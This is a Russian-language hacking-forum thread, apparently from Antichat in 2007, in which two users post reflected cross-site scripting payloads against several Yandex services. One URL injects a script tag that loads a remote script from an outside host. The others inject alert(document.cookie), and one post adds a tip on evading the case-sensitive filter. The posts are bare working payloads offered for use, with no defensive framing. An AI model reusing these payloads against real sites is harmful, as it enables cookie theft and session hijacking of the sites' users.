HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 13.12.2007, 13:50
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

PHP код:
http://fotki.yandex.ru/actions/favorites-add.xml?author=lalala%22%3E%3Cscript%20src=%22http://toxa.nov.ru/s.js%22%3E%3C/script%3E 
__________________
 
Ответить с цитированием

  #22  
Старый 28.12.2007, 02:22
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

И есчо XSS
news.yandex.ru
Код:
http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>
Вот собственно XSS
direct.yandex.ru
Код:
http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>
И есчо ...

market.yandex.ru
Поиск:
Код:
<SCRIPT> alert(document.cookie); </SCRIPT>
!Регистр имеет значение, ибо, хоть и слабая, но фильтрация!
Код:
http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT>

Последний раз редактировалось ZAMUT; 19.01.2008 в 00:26..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.